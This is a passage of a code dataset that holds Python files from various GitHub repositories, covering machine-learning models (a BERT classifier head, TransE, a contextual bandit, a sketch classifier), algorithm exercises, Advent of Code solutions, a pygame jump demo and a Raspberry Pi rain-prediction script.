self.dropout = nn.Dropout(classifier_dropout)\n self.classifier = nn.Linear(config.hidden_size, config.num_labels)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n\n def forward(\n self,\n input_ids: Optional[torch.Tensor] = None,\n attention_mask: Optional[torch.Tensor] = None,\n token_type_ids: Optional[torch.Tensor] = None,\n position_ids: Optional[torch.Tensor] = None,\n head_mask: Optional[torch.Tensor] = None,\n inputs_embeds: Optional[torch.Tensor] = None,\n labels: Optional[torch.Tensor] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple[torch.Tensor], SequenceClassifierOutput]:\n r\"\"\"\n labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):\n Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,\n config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If\n `config.num_labels > 1` a classification loss is computed (Cross-Entropy).\n \"\"\"\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n outputs = self.bert(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n last_hidden_state = outputs[0]\n cls_representation = last_hidden_state[:,0,:]\n pooled_output = self.dropout(cls_representation)\n logits = self.classifier(pooled_output)\n\n loss = None\n if labels is not None:\n if self.config.problem_type is None:\n if self.num_labels == 1:\n self.config.problem_type = \"regression\"\n elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):\n self.config.problem_type = \"single_label_classification\"\n else:\n self.config.problem_type = \"multi_label_classification\"\n\n if self.config.problem_type == \"regression\":\n loss_fct = MSELoss()\n if self.num_labels == 1:\n loss = loss_fct(logits.squeeze(), labels.squeeze())\n else:\n loss = loss_fct(logits, labels)\n elif self.config.problem_type == \"single_label_classification\":\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n elif self.config.problem_type == \"multi_label_classification\":\n loss_fct = BCEWithLogitsLoss()\n loss = loss_fct(logits, labels)\n if not return_dict:\n output = (logits,) + outputs[2:]\n return ((loss,) + output) if loss is not None else output\n\n return SequenceClassifierOutput(\n loss=loss,\n logits=logits,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n","repo_name":"dhesin/RNABERT-2","sub_path":"custom_classification_head.py","file_name":"custom_classification_head.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"44"} +{"seq_id":"19500765991","text":"import sys\n# sys.stdin = open('회전 초밥.txt', 'r')\ninput = sys.stdin.readline\nn, d, k, c = map(int, input().split())\ndishes = []\nfor i in range(n):\n dishes.append(int(input()))\n\n# check for (duplicate) number of dishes\ndef check_seen(seen, i):\n if dishes[i] not in seen:\n seen[dishes[i]] = 0\n seen[dishes[i]] += 1\n return seen\n\nk_dishes = []\nseen = {}\n\n# set k_dishes by pushing index o to k-1 from dishes\nfor i in range(k):\n k_dishes.append(dishes[i])\n seen = check_seen(seen, i)\n\n# set res by calculating diff number of dishes\nres = len(seen.keys())\nif c not in seen.keys():\n res += 1\n\nfor x in range(k, n+k-1):\n i = x%n\n\n # setting k_dishes to represent the next k_dishes by pop and push\n top_dish = k_dishes.pop(0)\n seen[top_dish] -= 1\n if seen[top_dish] == 0:\n seen.pop(top_dish)\n\n k_dishes.append(dishes[i])\n seen = check_seen(seen, i)\n\n # calculate diff number of dishes\n temp_res = len(seen.keys())\n if c not in seen.keys():\n temp_res += 1\n\n res = max(res, temp_res)\nprint(res)\n\n\n\n \n\n","repo_name":"SeungAh-Hong/algorithm-study","sub_path":"Baekjoon/hyunjeong/회전 초밥.py","file_name":"회전 초밥.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"15313727277","text":"def filter_bits(nums: list[str], b: bool) -> int:\n bits = len(nums[0])\n for i in range(bits):\n temp = []\n count = 0\n\n for number in nums:\n if number[i] == \"1\":\n count += 1\n\n if count >= len(nums) / 2: # Mehrheit 1\n temp += [n for n in nums if (b and n[i] == \"1\") or (not b and n[i] == \"0\")]\n\n else: # Mehrheit 0\n temp += [n for n in nums if (b and n[i] == \"0\") or (not b and n[i] == \"1\")]\n\n nums = temp\n if len(nums) == 1:\n return int(nums[0], 2)\n\n\ndef main(file: str) -> int:\n with open(file, \"r\") as f:\n nums = [str(line).strip() for line in f]\n\n oxygen = filter_bits(nums, True)\n c02 = filter_bits(nums, False)\n return oxygen * c02\n\n\nif __name__ == '__main__':\n print(main('input.txt'))\n","repo_name":"NilsDeckert/Advent-of-code","sub_path":"2021/Day 3 - 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29277363769","text":"from core.classes.Deck import Deck\n\n\nclass ValuesRatioLister:\n\n def __init__(self, ratio: float):\n self.__ratio = ratio\n\n def __get_ratio(self):\n return self.__ratio\n\n def __set_ratio(self, ratio):\n self.__ratio = ratio\n\n ratio = property(__get_ratio, __set_ratio)\n\n def get_values_ratio_list(self, values, available_cases=100):\n \"\"\"\n this function return integer list that contains that\n allocates values according to the ratio\n \"\"\"\n result = []\n\n if not values:\n return None\n if len(values) == 1 or self.__ratio == 1:\n return [values[0]] * available_cases\n\n cases_to_take = round(available_cases * self.__ratio)\n if available_cases - cases_to_take <= 1:\n if cases_to_take > 1:\n cases_to_take -= 1\n result += [values[0]] * cases_to_take\n\n if len(values) > 1:\n values.pop(0)\n result += self.get_values_ratio_list(values, available_cases - cases_to_take)\n\n return result\n","repo_name":"Mikadows/AnkiLike","sub_path":"core/utils/ValuesRatioLister.py","file_name":"ValuesRatioLister.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19014481323","text":"import numpy as np\nfrom utils import readFileReturnList, listElemStr2Int\nimport time\nimport cv2\n\ndef main():\n width = 1000\n height = 1000\n\n field = np.zeros([width,height])\n img = np.zeros([width,height,3])\n for i in range(width):\n for j in range(height):\n if field[i][j] == 0:\n img[i][j] = (0,0,0)\n elif field[i][j] == 1:\n img[i][j] = (0,255,0)\n else:\n img[i][j] = (0,0,255)\n #lines = readFileReturnList(\"Day5_input_sample\")\n lines = readFileReturnList(\"Day5_input\")\n \n for line in lines:\n line = line.replace(' -> ',',')\n line = line.split(',')\n line = listElemStr2Int(line)\n #print(line)\n xdiff = line[2] - line[0]\n ydiff = line[3] - line[1]\n if xdiff != 0:\n grad = ydiff/xdiff\n else:\n grad = 'inf'\n if(line[0] == line[2]): # x1 == x2\n if(line[1] > line[3]):\n for i in range(line[3],line[1]+1):\n field[line[0]][i] += 1\n else:\n for i in range(line[1],line[3]+1):\n field[line[0]][i] += 1\n elif(line[1] == line[3]): # y1 == y2\n if(line[0] > line[2]):\n for i in range(line[2],line[0]+1):\n field[i][line[1]] += 1\n else:\n for i in range(line[0],line[2]+1):\n field[i][line[1]] += 1\n #### below condition for part 2 ####\n # +45deg\n elif( (abs(xdiff) == abs(ydiff))\n & (grad < 0) ):\n diff = abs(xdiff)\n #print(line)\n #print(diff)\n for i in range(diff+1):\n field[min(line[0],line[2])+i][max(line[1],line[3])-i] += 1\n # -45deg\n elif( (abs(xdiff) == abs(ydiff))\n & (grad > 0) ):\n diff = abs(xdiff)\n #print(line)\n #print(diff)\n for i in range(diff+1):\n field[min(line[0],line[2])+i][min(line[1],line[3])+i] += 1\n #print(field.transpose())\n\n print(\"size of field = (%d, %d)\"%(width,height))\n result = 0\n img = np.zeros([width,height,3])\n field = field.transpose()\n for i in range(width):\n for j in range(height):\n if field[i][j] == 0:\n img[i][j] = (0,0,0)\n if i%2 == 0:\n img[i][j] += (30,30,30)\n if j%2 == 0:\n img[i][j] += (30,30,30) \n elif field[i][j] == 1:\n img[i][j] = (0,250,50)\n elif field[i][j] == 2:\n img[i][j] = (0,100,150)\n result += 1\n else:\n img[i][j] = (0,50,250)\n result += 1\n img = img/255\n print(result)\n #img = cv2.resize(img, dsize=(0,0), fx=20, fy=20, interpolation=cv2.INTER_NEAREST)\n #img = cv2.resize(img, dsize=(0,0), fx=0.5, fy=0.5, interpolation=cv2.INTER_LINEAR)\n cv2.imshow('field', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n exit()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mat0imaru/AoC","sub_path":"2021/Day5.py","file_name":"Day5.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14752687422","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 6 00:59:38 2020\r\n\r\n@author: pcstream\r\n\"\"\"\r\n\r\nfrom separa import separa as sep\r\n\r\ndef maiorpalavra(text):\r\n maior = \"\"\r\n desmenb = sep(text, ',')\r\n for i in desmenb:\r\n if len(i) > len(maior):\r\n maior = i\r\n return maior\r\n \r\n ","repo_name":"flashlan/Curso-Ciencia-da-Computacao-com-Python-Parte-2-Alternative-Solutions","sub_path":"maiorpalavra.py","file_name":"maiorpalavra.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34612338555","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass TransE(nn.Module):\n def __init__(self, num_of_entities: int, num_of_relations: int, num_of_dimensions: int, norm: int = 2):\n super().__init__()\n self.norm = norm\n with torch.no_grad():\n self.entity_embeddings = nn.Embedding(num_of_entities, num_of_dimensions)\n self.entity_embeddings.weight.data.uniform_(-6 / num_of_dimensions ** 0.5, 6 / num_of_dimensions ** 0.5)\n\n self.relation_embeddings = nn.Embedding(num_of_relations, num_of_dimensions)\n self.relation_embeddings.weight.data.uniform_(-6 / num_of_dimensions ** 0.5, 6 / num_of_dimensions ** 0.5)\n self.relation_embeddings.weight.data = F.normalize(self.relation_embeddings.weight.data, p=2, dim=1)\n\n def forward(self, batch: torch.tensor, corrupted_batch: torch.tensor):\n # normalize entity embeddings\n with torch.no_grad():\n self.entity_embeddings.weight.data = F.normalize(self.entity_embeddings.weight.data, p=2, dim=1)\n\n # destructure batch into head_ids, relation_ids, tail_ids\n batch_head_ids = batch[:, 0]\n batch_relation_ids = batch[:, 1]\n batch_tail_ids = batch[:, 2]\n\n corr_batch_head_ids = corrupted_batch[:, 0]\n corr_batch_relation_ids = corrupted_batch[:, 1]\n corr_batch_tail_ids = corrupted_batch[:, 2]\n\n # get corresponding embeddings\n batch_head_embeddings = self.entity_embeddings(batch_head_ids)\n batch_relation_embeddings = self.relation_embeddings(batch_relation_ids)\n batch_tail_embeddings = self.entity_embeddings(batch_tail_ids)\n\n corr_batch_head_embeddings = self.entity_embeddings(corr_batch_head_ids)\n corr_batch_relation_embeddings = self.relation_embeddings(corr_batch_relation_ids)\n corr_batch_tail_embeddings = self.entity_embeddings(corr_batch_tail_ids)\n\n batch_energies = batch_head_embeddings + batch_relation_embeddings - batch_tail_embeddings\n corr_batch_energies = corr_batch_head_embeddings + corr_batch_relation_embeddings - corr_batch_tail_embeddings\n\n return batch_energies, corr_batch_energies\n","repo_name":"rlafraie/TransE","sub_path":"TransE.py","file_name":"TransE.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42656743287","text":"import time\nfrom sensors import bme280, tsl2561, lcd\nfrom ai.train import RainPrediction\nfrom util.data import normalize_sensors\n\n\ndef main():\n lcd_display = lcd.get_lcd()\n lcd_display.color = (255, 0, 0)\n rain_prediction = RainPrediction()\n rain_prediction.load_all_models()\n lcd_display.color = (0, 0, 255)\n while True:\n bme = bme280.get_sensor()\n tsl = tsl2561.get_sensor()\n data = {\n \"temperature\": bme.temperature,\n \"pressure\": bme.pressure,\n \"humidity\": bme.humidity,\n \"dewpoint\": bme.dewpoint,\n \"luminosity\": tsl.broadband,\n }\n\n if lcd_display.up_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction = rain_prediction.make_prediction(\n \"precipitation_1h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 1h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.right_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction = rain_prediction.make_prediction(\n \"precipitation_6h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 6h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.down_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction = rain_prediction.make_prediction(\n \"precipitation_12h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 12h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.left_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction = rain_prediction.make_prediction(\n \"precipitation_24h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 24h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.select_button:\n lcd_display.clear()\n lcd_display.color = (0, 0, 0)\n break\n else:\n lcd_display.message = f'T:{data[\"temperature\"]:.02f} H:{data[\"humidity\"]:.02f}\\nP:{data[\"pressure\"]:.02f} L:{data[\"luminosity\"]:05f}'\n time.sleep(0.1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pireu2/Rain-Prediction-Instrument","sub_path":"ai/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29358281748","text":"import sys\nimport pygame\n\nscreen = None\n# 게임 화면 크기\nscreen_width = 800\nscreen_height = 500\n\n# 색상\nWHITE = (255, 255, 255)\n\n# 속도와 질량 기본 값\nVELOCITY = 7 # 속도\nMASS = 2 # 질량\n\nclass Car:\n def __init__(self):\n self.image = None\n self.rect = None\n self.dx = 0\n self.dy = 0\n self.isJump = 0 # 바닥(0), 점프중 (1), 이중점프(2)\n self.v = VELOCITY # 속도\n self.m = MASS # 질량\n\n def load_car(self): # 자동차 이미지를 불러와 위치를 정한다.\n # 플레이어 차량\n self.image = pygame.image.load(\"assets/images/smallcar.png\")\n # 크기 조정\n self.image = pygame.transform.scale(self.image, (150, 57))\n self.rect = self.image.get_rect()\n self.rect.bottom = screen_height\n\n def draw_car(self): # 자동차를 스크린에 그리기\n screen.blit(self.image, [self.rect.x, self.rect.y])\n\n # x 좌표 이동 - 플레이어 자동차의 움직임 제어할 때 필요\n def move_x(self):\n self.rect.x += self.dx\n\n def check_screen(self): # 화면 밖으로 못 나가게 방지\n if self.rect.right > screen_width or self.rect.x < 0:\n self.rect.x -= self.dx\n print('check_screen', self.rect.bottom, screen_height, self.rect.y)\n if self.rect.bottom > screen_height or self.rect.y < 0:\n self.rect.y -= self.dy\n \n def jump(self, j): # 점프상태 변경\n self.isJump = j\n \n def doJump(self):\n # isJump 값이 0보다 큰지 확인\n if self.isJump > 0:\n # isJump 값이 2일 경우 속도를 리셋\n # 점프 한 상태에서 다시 점프를 위한 값\n\n # 이 코드를 주석처리하면 이중점프를 못한다.\n if self.isJump == 2:\n self.v = VELOCITY\n\n # 역학공식 계산 (F). F = 0.5 * mass * velocity^2.\n if self.v > 0:\n # 속도가 0보다 클때는 위로 올라감\n F = (0.5 * self.m * (self.v * self.v))\n else:\n # 속도가 0보다 작을때는 아래로 내려감\n F = -(0.5 * self.m * (self.v * self.v))\n\n # 좌표 수정 : 위로 올라가기 위해서는 y 좌표를 줄여준다.\n self.rect.y -= round(F)\n\n # 속도 줄여줌\n self.v -= 1\n\n # 바닥에 닿았을때, 변수 리셋\n if self.rect.bottom > screen_height:\n self.rect.bottom = screen_height\n self.isJump = 0\n self.v = VELOCITY\n\n\ndef main():\n global screen, screen_width, screen_height\n\n # pygame 초기화 및 스크린 생성\n pygame.init()\n screen = pygame.display.set_mode((screen_width, screen_height))\n pygame.display.set_caption(\"Jump Test\")\n\n clock = pygame.time.Clock()\n\n player = Car() # 플레이어 자동차 생성, player 라는 객체를 생성한다.\n player.load_car() # 자동차 이미지 로드\n\n playing = True\n\n while playing:\n keys = pygame.key.get_pressed() # 키가 눌린 상태 체크\n # 스페이스키가 눌려있고, isJump가 2라면 1로 변경한다.\n # 이 작업을 해주지 않으면 스페이스가 눌려있는 상태면 플레이어가 계속 위로 올라가게 된다.\n if (keys[pygame.K_SPACE]):\n if player.isJump == 2:\n player.jump(1)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playing = False\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.KEYDOWN: # 키를 눌렀을 경우\n if event.key == pygame.K_RIGHT: # 방향키를 눌렀을 경우 자동차의 위치를 바꾼다.\n player.dx = 5\n elif event.key == pygame.K_LEFT:\n player.dx = -5\n \n # 스페이스키를 눌렀을 때,\n # 0이면 바닥인 상태 : 1로 변경\n # 1이면 점프를 한 상태 : 2로 변경, 점프한 위치에서 다시 점프를 하게 된다. 즉, 이중점프\n if event.key == pygame.K_SPACE:\n if player.isJump == 0: # 자동차가 바닥에 있으면\n player.jump(1)\n elif player.isJump == 1: # 현재 점핑 중일 경우\n player.jump(2)\n \n if event.type == pygame.KEYUP: # 키에서 손을 땔 경우\n if event.key == pygame.K_RIGHT:\n player.dx = 0\n elif event.key == pygame.K_LEFT:\n player.dx = 0\n\n screen.fill(WHITE) # 배경색을 흰색으로\n\n player.draw_car() # 자동차를 그린다.\n player.move_x()\n\n player.doJump() # 플레이어의 y 좌표를 움직여주는 메서드 추가, 점프하는 것\n player.check_screen() # 화면밖으로 나가지 않게 처리\n\n pygame.display.flip()\n clock.tick(60) # 초당 60번 실행\n\nif __name__ == '__main__':\n main()\n","repo_name":"wangta69/py_games","sub_path":"games/jump/step-05.py","file_name":"step-05.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"30051247264","text":"def answer(n):\n arr = []\n minSum = n\n while minSum:\n last = getMaxSq(minSum)\n minSum -= last\n if last == 0:\n arr.append(1)\n else:\n arr.append(last)\n \n return arr\n\ndef getMaxSq(n):\n i = 1\n lastSq = 0\n while 1:\n square = i ** 2\n if square >= n:\n break\n lastSq = square;\n i += 1\n\n if lastSq == 0:\n lastSq = 1\n\n return lastSq","repo_name":"Almo7aya/foo.bar-solution","sub_path":"py/level1.py","file_name":"level1.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30007593856","text":"import numpy as np \nimport torch\nfrom mab import eps_bandit\n\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\"\"\"\nDeep Q-network.\n\"\"\"\nclass DQN(torch.nn.Module):\n def __init__(self, state_dim, hidden_dim, num_actions):\n super(DQN, self).__init__()\n self.net = torch.nn.Sequential(\n torch.nn.Linear(state_dim, 32),\n torch.nn.ReLU(),\n torch.nn.Linear(32, 32),\n torch.nn.ReLU(),\n torch.nn.Linear(32, 32),\n torch.nn.ReLU(),\n torch.nn.Linear(32, num_actions))\n return \n\n def forward(self, x):\n if type(x) is not torch.Tensor:\n x = torch.tensor(x, device=DEVICE)\n y = self.net(x.float())\n return y\n\nclass contextual_bandit(eps_bandit):\n '''\n contextual epsilon-greedy k-bandit problem\n \n Inputs\n =====================================================\n k: number of arms (int)\n eps: probability of random action 0 < eps < 1 (float)\n iters: number of steps (int)\n mu: set the average rewards for each of the k-arms.\n Set to \"random\" for the rewards to be selected from\n a normal distribution with mean = 0. \n Set to \"sequence\" for the means to be ordered from \n 0 to k-1.\n Pass a list or array of length = k for user-defined\n values.\n '''\n \n def __init__(self, k, eps, iters, hidden_size, state_size, mu='random', learning_rate=0.5, qnet=None):\n # Number of arms\n self.k = k\n # Search probability\n self.eps = eps\n # Number of iterations\n self.iters = iters\n # Step count\n self.n = 0\n # Step count for each arm\n self.k_n = np.zeros(k)\n \n # Total mean reward\n self.mean_reward = 0\n \n # Mean reward for each arm\n self.reward = np.zeros(iters)\n \n self.hidden_size=hidden_size\n self.state_size=state_size\n \n self.neuralNet = DQN(state_dim=self.state_size, hidden_dim=self.hidden_size, num_actions=self.k).to(DEVICE)\n self.opt = torch.optim.Adam(params=self.neuralNet.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.SmoothL1Loss()\n \n if type(mu) == list or type(mu).__module__ == np.__name__:\n # User-defined averages \n self.mu = np.array(mu)\n elif mu == 'random':\n # Draw means from probability distribution\n self.mu = np.random.normal(0, 1, k)\n elif mu == 'sequence':\n # Increase the mean for each arm by one\n self.mu = np.linspace(0, k-1, k)\n\n np.random.seed(13)\n torch.manual_seed(13)\n \n def act(self, state, eps = 0):\n with torch.no_grad():\n self.neuralNet.eval()\n q_values = self.neuralNet(state)\n # Random action.\n if np.random.rand() < eps:\n nA = q_values.shape[-1]\n action = np.random.choice(nA)\n # Greedy policy.\n else:\n action = q_values.argmax().cpu().numpy()\n return action\n \n def learn(self, reward, state, action):\n # Update counts\n self.n += 1\n self.k_n[action] += 1\n \n # Update total\n self.mean_reward = self.mean_reward + (\n reward - self.mean_reward) / self.n\n\n self.neuralNet.train()\n q_values = self.neuralNet(state)\n y = q_values.max()\n\n # Update results for a_k\n with torch.no_grad():\n yhat = y + (reward - y) / self.k_n[action]\n yhat = yhat.reshape(y.shape).float()\n \n # # Back-propagation.\n self.opt.zero_grad()\n loss = self.loss_fn(y, yhat)\n loss.backward()\n self.opt.step()\n \n def incrementIters(self, increment): \n self.iters += int(increment)\n return\n\n def reset(self):\n # Resets results while keeping settings\n self.n = 0\n self.k_n = np.zeros(self.k)\n self.mean_reward = 0\n self.reward = np.zeros(self.iters)\n self.neuralNet = np.zeros(self.k)\n return","repo_name":"AdrianBaronHyppolite/Adrian-MmwaveSetup","sub_path":"python/contextualMab.py","file_name":"contextualMab.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19500728331","text":"def calculate(line, R, C, S, ro, rc, co, cc, so, sc):\n line_ro = line.count('(')\n line_rc = line.count(')')\n line_co = line.count('{')\n line_cc = line.count('}')\n line_so = line.count('[')\n line_sc = line.count(']')\n\n indent = R*(ro-rc) + C*(co-cc) + S*(so-sc)\n\n if ro+line_ro-rc != co+line_co-cc or ro+line_ro-rc != so+line_so-sc:\n return -1\n\n ro += line_ro\n rc += line_rc\n co += line_co\n cc += line_cc\n so += line_so\n sc += line_sc\n\n return indent\n\n\nwhile True:\n p, q = map(int, input().split())\n\n if p == q == 0:\n break\n\n ro = rc = co = cc = so = sc = 0\n\n for i in range(p):\n line = input().strip()\n indent = calculate(line, R, C, S, ro, rc, co, cc, so, sc)\n if indent == -1:\n print(-1)\n break\n print(indent)\n else:\n for i in range(q):\n line = input().strip()\n indent = calculate(line, R, C, S, ro, rc, co, cc, so, sc)\n if indent == -1:\n print(-1)\n break\n print(indent, end=' ')\n else:\n print()\n print(\"\\n\")\n","repo_name":"SeungAh-Hong/algorithm-study","sub_path":"Baekjoon/hyunjeong/스타일리시.py","file_name":"스타일리시.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"33597797071","text":"# s1 = pd.get_dummies()\r\n# for x in range(10):\r\n# s1.set_value(x, x ** 2)\r\n# print(s1)\r\n\r\n\r\nx = [2, 3, 4, 5, 6]\r\ny = [lambda v: v * 5 for v in x]\r\nfor i, val in enumerate(a):\r\n print(x)\r\n","repo_name":"bharatsdev/Machine-Learning-with-Python","sub_path":"ND2-finding_donors/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22286002745","text":"from tensorflow.keras.models import load_model\nimport numpy as np\nfrom random import choice\nfrom PIL import Image\nimport base64\nimport pymongo\nimport io\nglobal scoretotal\nscoretotal = 0\n\ndef initialize():\n model = load_model('keras10objects.h5')\n f = open(\"categories.txt\", \"r\")\n classes = f.read().split('\\n')[:-1]\n f.close()\n return model, classes\n\n\ndef getObject(classes):\n\treturn choice(classes)\n\n\ndef predict(model, classes, image, category):\n global scoretotal\n image = base64.b64decode(image)\n image = Image.open(io.BytesIO(image)).convert('L').resize((28, 28))\n image = np.array(image).reshape(28, 28, 1).astype('float32')/255.0\n prediction = model.predict(np.expand_dims(image, axis=0))[0]\n print(prediction[classes.index(category)])\n if (prediction[classes.index(category)]) < 0.5:\n return [\"Failed\", 0, 0, category, scoretotal]\n ind = (-prediction).argsort()[:5]\n result = [classes[x] for x in ind]\n if (result.index(category)+1 == 1):\n score = 50\n elif (result.index(category)+1 == 2):\n score = 40\n elif (result.index(category)+1 == 3):\n score = 30\n elif (result.index(category)+1 == 4):\n score = 20\n elif (result.index(category)+1 == 5):\n score = 10\n else:\n score = 0\n scoretotal += score\n wordsList = [\"Perfect\", \"Excellent\", \"Very Good\", \"Good\", \"Average\"]\n try:\n return wordsList[result.index(category)], score, result.index(category)+1, category, scoretotal\n except ValueError:\n return [\"Failed\", 0, 0, category, scoretotal]\n","repo_name":"software-students-fall2022/containerized-app-exercise-team4","sub_path":"machine-learning-client/quickdraw.py","file_name":"quickdraw.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"}